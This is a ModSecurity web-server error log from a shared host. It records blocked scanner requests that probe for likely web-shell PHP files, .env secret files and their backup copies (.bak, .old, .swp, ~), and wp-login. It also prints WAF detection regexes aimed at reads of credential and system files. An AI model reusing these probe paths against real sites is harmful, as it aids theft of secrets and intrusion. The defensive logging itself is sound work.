[Tue May 26 16:26:31.751656 2026] [security2:error] [pid 795941:tid 796152] [client 20.226.60.108:35149] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/asd.php"] [unique_id "ahV8X-2GQ_TLE_VHIp2kvwAAANY"]
[Tue May 26 16:26:32.172212 2026] [security2:error] [pid 795941:tid 796081] [client 20.226.60.108:35191] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/default.php"] [unique_id "ahV8YO2GQ_TLE_VHIp2kyQAAAI8"]
[Tue May 26 16:26:32.172310 2026] [security2:error] [pid 795941:tid 796081] [client 20.226.60.108:35191] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/default.php"] [unique_id "ahV8YO2GQ_TLE_VHIp2kyQAAAI8"]
[Tue May 26 16:26:32.588330 2026] [security2:error] [pid 795941:tid 796123] [client 20.226.60.108:44898] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/gettest.php"] [unique_id "ahV8YO2GQ_TLE_VHIp2k1wAAALk"]
[Tue May 26 16:26:32.588433 2026] [security2:error] [pid 795941:tid 796123] [client 20.226.60.108:44898] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/gettest.php"] [unique_id "ahV8YO2GQ_TLE_VHIp2k1wAAALk"]
[Tue May 26 16:26:33.031422 2026] [security2:error] [pid 795941:tid 796129] [client 20.226.60.108:60793] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/install.php"] [unique_id "ahV8Ye2GQ_TLE_VHIp2k6QAAAL8"]
[Tue May 26 16:26:33.031581 2026] [security2:error] [pid 795941:tid 796129] [client 20.226.60.108:60793] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/install.php"] [unique_id "ahV8Ye2GQ_TLE_VHIp2k6QAAAL8"]
[Tue May 26 16:26:33.431584 2026] [security2:error] [pid 795941:tid 796113] [client 20.226.60.108:43630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/tfm.php"] [unique_id "ahV8Ye2GQ_TLE_VHIp2k_QAAAK8"]
[Tue May 26 16:26:33.431699 2026] [security2:error] [pid 795941:tid 796113] [client 20.226.60.108:43630] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/tfm.php"] [unique_id "ahV8Ye2GQ_TLE_VHIp2k_QAAAK8"]
[Tue May 26 16:26:33.567195 2026] [security2:error] [pid 795941:tid 796088] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8YO2GQ_TLE_VHIp2k3wAAAJY"]
[Tue May 26 16:26:33.696067 2026] [security2:error] [pid 795941:tid 796149] [client 185.191.171.13:56994] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-7-11/day/2022-11-06/"] [unique_id "ahV8Ye2GQ_TLE_VHIp2lBAAAANM"]
[Tue May 26 16:26:33.696219 2026] [security2:error] [pid 795941:tid 796149] [client 185.191.171.13:56994] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-7-11/day/2022-11-06/"] [unique_id "ahV8Ye2GQ_TLE_VHIp2lBAAAANM"]
[Tue May 26 16:26:33.933034 2026] [security2:error] [pid 795941:tid 796121] [client 20.226.60.108:60740] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/ws81.php"] [unique_id "ahV8Ye2GQ_TLE_VHIp2lCwAAALc"]
[Tue May 26 16:26:33.933139 2026] [security2:error] [pid 795941:tid 796121] [client 20.226.60.108:60740] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/ws81.php"] [unique_id "ahV8Ye2GQ_TLE_VHIp2lCwAAALc"]
[Tue May 26 16:26:34.180323 2026] [security2:error] [pid 795941:tid 796092] [client 160.119.76.58:44526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/xmlrpc.php"] [unique_id "ahV8Ye2GQ_TLE_VHIp2lBgAAAJo"]
[Tue May 26 16:26:34.335915 2026] [security2:error] [pid 795941:tid 796129] [client 20.226.60.108:18480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/222.php"] [unique_id "ahV8Yu2GQ_TLE_VHIp2lFAAAAL8"]
[Tue May 26 16:26:34.336009 2026] [security2:error] [pid 795941:tid 796129] [client 20.226.60.108:18480] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/222.php"] [unique_id "ahV8Yu2GQ_TLE_VHIp2lFAAAAL8"]
[Tue May 26 16:26:34.389381 2026] [security2:error] [pid 795941:tid 796000] [remote 5.250.187.247:35710] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.187.250.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahV8Yu2GQ_TLE_VHIp2lEgAAyjo"]
[Tue May 26 16:26:34.632820 2026] [security2:error] [pid 795941:tid 796196] [client 160.119.76.58:44540] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/wp-login.php"] [unique_id "ahV8Yu2GQ_TLE_VHIp2lHwAAAQI"]
[Tue May 26 16:26:34.768788 2026] [security2:error] [pid 795941:tid 796113] [client 20.226.60.108:25863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/t.php"] [unique_id "ahV8Yu2GQ_TLE_VHIp2lIwAAAK8"]
[Tue May 26 16:26:34.768884 2026] [security2:error] [pid 795941:tid 796113] [client 20.226.60.108:25863] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/t.php"] [unique_id "ahV8Yu2GQ_TLE_VHIp2lIwAAAK8"]
[Tue May 26 16:26:35.029682 2026] [security2:error] [pid 795941:tid 796131] [client 114.119.152.231:45155] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "onesoft.in"] [uri "/product.html"] [unique_id "ahV8Y-2GQ_TLE_VHIp2lKwAAAME"], referer: https://onesoft.in/product.html
[Tue May 26 16:26:35.173915 2026] [security2:error] [pid 795941:tid 796085] [client 208.84.100.238:29514] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env"] [unique_id "ahV8Y-2GQ_TLE_VHIp2lLAAAAJM"]
[Tue May 26 16:26:35.254588 2026] [security2:error] [pid 795941:tid 796084] [client 208.84.100.238:29738] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/app/.env"] [unique_id "ahV8Y-2GQ_TLE_VHIp2lNgAAAJI"]
[Tue May 26 16:26:35.257947 2026] [security2:error] [pid 795941:tid 796078] [client 208.84.100.238:29558] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/backend/.env"] [unique_id "ahV8Y-2GQ_TLE_VHIp2lRgAAAIw"]
[Tue May 26 16:26:35.261423 2026] [security2:error] [pid 795941:tid 796115] [client 208.84.100.238:29546] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/api/.env"] [unique_id "ahV8Y-2GQ_TLE_VHIp2lTwAAALE"]
[Tue May 26 16:26:35.264122 2026] [security2:error] [pid 795941:tid 796103] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Yu2GQ_TLE_VHIp2lIgAAAKU"]
[Tue May 26 16:26:35.302634 2026] [security2:error] [pid 795941:tid 796073] [client 20.226.60.108:24401] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-admin/maint/index.php"] [unique_id "ahV8Y-2GQ_TLE_VHIp2lUAAAAIc"]
[Tue May 26 16:26:35.302733 2026] [security2:error] [pid 795941:tid 796073] [client 20.226.60.108:24401] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-admin/maint/index.php"] [unique_id "ahV8Y-2GQ_TLE_VHIp2lUAAAAIc"]
[Tue May 26 16:26:35.506050 2026] [security2:error] [pid 795941:tid 796099] [client 47.128.97.168:59730] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.moneyapp.com.co"] [uri "/robots.txt"] [unique_id "ahV8Y-2GQ_TLE_VHIp2lVgAAAKE"]
[Tue May 26 16:26:35.691699 2026] [security2:error] [pid 795941:tid 796109] [client 20.226.60.108:26818] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/6xBAm3vODE05BSzkJZRAws.php"] [unique_id "ahV8Y-2GQ_TLE_VHIp2lWQAAAKs"]
[Tue May 26 16:26:35.691796 2026] [security2:error] [pid 795941:tid 796109] [client 20.226.60.108:26818] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/6xBAm3vODE05BSzkJZRAws.php"] [unique_id "ahV8Y-2GQ_TLE_VHIp2lWQAAAKs"]
[Tue May 26 16:26:36.097102 2026] [security2:error] [pid 795941:tid 796155] [client 20.226.60.108:26439] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/a.php"] [unique_id "ahV8ZO2GQ_TLE_VHIp2lXQAAANk"]
[Tue May 26 16:26:36.097200 2026] [security2:error] [pid 795941:tid 796155] [client 20.226.60.108:26439] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/a.php"] [unique_id "ahV8ZO2GQ_TLE_VHIp2lXQAAANk"]
[Tue May 26 16:26:36.512395 2026] [security2:error] [pid 795941:tid 796144] [client 20.226.60.108:18437] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/a1.php"] [unique_id "ahV8ZO2GQ_TLE_VHIp2lbAAAAM4"]
[Tue May 26 16:26:36.512496 2026] [security2:error] [pid 795941:tid 796144] [client 20.226.60.108:18437] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/a1.php"] [unique_id "ahV8ZO2GQ_TLE_VHIp2lbAAAAM4"]
[Tue May 26 16:26:36.918879 2026] [security2:error] [pid 795941:tid 796075] [client 208.84.100.238:29618] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env.production.copy"] [unique_id "ahV8ZO2GQ_TLE_VHIp2ldQAAAIk"]
[Tue May 26 16:26:36.974276 2026] [security2:error] [pid 795941:tid 796171] [client 20.226.60.108:44886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/onclickfuns.php"] [unique_id "ahV8ZO2GQ_TLE_VHIp2leQAAAOk"]
[Tue May 26 16:26:36.974396 2026] [security2:error] [pid 795941:tid 796171] [client 20.226.60.108:44886] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/onclickfuns.php"] [unique_id "ahV8ZO2GQ_TLE_VHIp2leQAAAOk"]
[Tue May 26 16:26:37.123692 2026] [security2:error] [pid 795941:tid 796151] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8ZO2GQ_TLE_VHIp2lbQAAANU"]
[Tue May 26 16:26:37.297927 2026] [core:error] [pid 795941:tid 796004] [remote 74.7.241.42:41254] AH10244: invalid URI path (/wp-content/themes/studio-fifty/js/%url%), referer: https://www.kardashevtechnologies.com/wp-content/themes/studio-fifty/js/main.js?ver=1.0.2
[Tue May 26 16:26:37.361076 2026] [security2:error] [pid 795941:tid 796154] [client 20.226.60.108:15577] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/w.php"] [unique_id "ahV8Ze2GQ_TLE_VHIp2lhQAAANg"]
[Tue May 26 16:26:37.361190 2026] [security2:error] [pid 795941:tid 796154] [client 20.226.60.108:15577] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/w.php"] [unique_id "ahV8Ze2GQ_TLE_VHIp2lhQAAANg"]
[Tue May 26 16:26:37.391067 2026] [security2:error] [pid 795941:tid 796094] [client 208.84.100.238:30012] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env.production.orig"] [unique_id "ahV8Ze2GQ_TLE_VHIp2ligAAAJw"]
[Tue May 26 16:26:37.391241 2026] [security2:error] [pid 795941:tid 796149] [client 208.84.100.238:29980] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env.production~"] [unique_id "ahV8Ze2GQ_TLE_VHIp2liwAAANM"]
[Tue May 26 16:26:37.391846 2026] [security2:error] [pid 795941:tid 796077] [client 208.84.100.238:29958] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env.production.backup"] [unique_id "ahV8Ze2GQ_TLE_VHIp2ljAAAAIs"]
[Tue May 26 16:26:37.392698 2026] [security2:error] [pid 795941:tid 796112] [client 208.84.100.238:29944] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env.production.bak"] [unique_id "ahV8Ze2GQ_TLE_VHIp2ljgAAAK4"]
[Tue May 26 16:26:37.392990 2026] [security2:error] [pid 795941:tid 796155] [client 208.84.100.238:29952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env.production.old"] [unique_id "ahV8Ze2GQ_TLE_VHIp2ljwAAANk"]
[Tue May 26 16:26:37.394758 2026] [security2:error] [pid 795941:tid 796136] [client 208.84.100.238:29824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env.backup"] [unique_id "ahV8Ze2GQ_TLE_VHIp2llQAAAMY"]
[Tue May 26 16:26:37.394774 2026] [security2:error] [pid 795941:tid 796083] [client 208.84.100.238:29932] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env.local~"] [unique_id "ahV8Ze2GQ_TLE_VHIp2lkgAAAJE"]
[Tue May 26 16:26:37.394931 2026] [security2:error] [pid 795941:tid 796106] [client 208.84.100.238:29864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env.orig"] [unique_id "ahV8Ze2GQ_TLE_VHIp2lmgAAAKg"]
[Tue May 26 16:26:37.395083 2026] [security2:error] [pid 795941:tid 796145] [client 208.84.100.238:29940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env.local.copy"] [unique_id "ahV8Ze2GQ_TLE_VHIp2lkQAAAM8"]
[Tue May 26 16:26:37.395130 2026] [security2:error] [pid 795941:tid 796193] [client 208.84.100.238:29854] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env.swp"] [unique_id "ahV8Ze2GQ_TLE_VHIp2llAAAAP8"]
[Tue May 26 16:26:37.395264 2026] [security2:error] [pid 795941:tid 796175] [client 208.84.100.238:29898] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env.local.old"] [unique_id "ahV8Ze2GQ_TLE_VHIp2lmQAAAO0"]
